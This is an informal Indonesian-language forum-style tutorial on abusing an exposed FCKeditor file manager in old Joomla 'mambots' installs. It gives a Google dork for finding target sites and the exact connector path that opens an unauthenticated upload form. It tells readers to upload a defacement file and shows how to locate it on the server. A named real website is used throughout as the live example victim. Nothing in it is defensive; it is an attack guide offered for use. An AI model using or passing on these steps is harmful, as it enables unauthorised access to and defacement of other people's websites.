Newbie Sejati

Joomla mambots File Upload Vulnerability, hehehehe..... sorry y kalo judulnya agak aneh soalnya ane buat sendiri tu judul, habisnya gk tau apa nama teknik/ tutorial yang bakal ane jelasin ini.

Gk pake basa-basi lagi malas ane ngetik-nya lagi. lansung kita ke topik pembahasan....

1. cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
2. kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
   ype=File&Connector=connectors/php/connector.php maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.
3. apabila selesai mengupload file maka file kita akan muncul di form/halam itu....
4. untuk melihat dimana lokasi file kita dilettakan. blok dan klik kanan file yang barusan kita upload kemudian pilih View Selection Source, akan muncul seperti berikut

Kurang lebih seperti itu tampilannya. kita lihat filenya ada di directory /File/ jadi letaknya ada di http://www.thomaskoetzing.de/File/70h4n.txt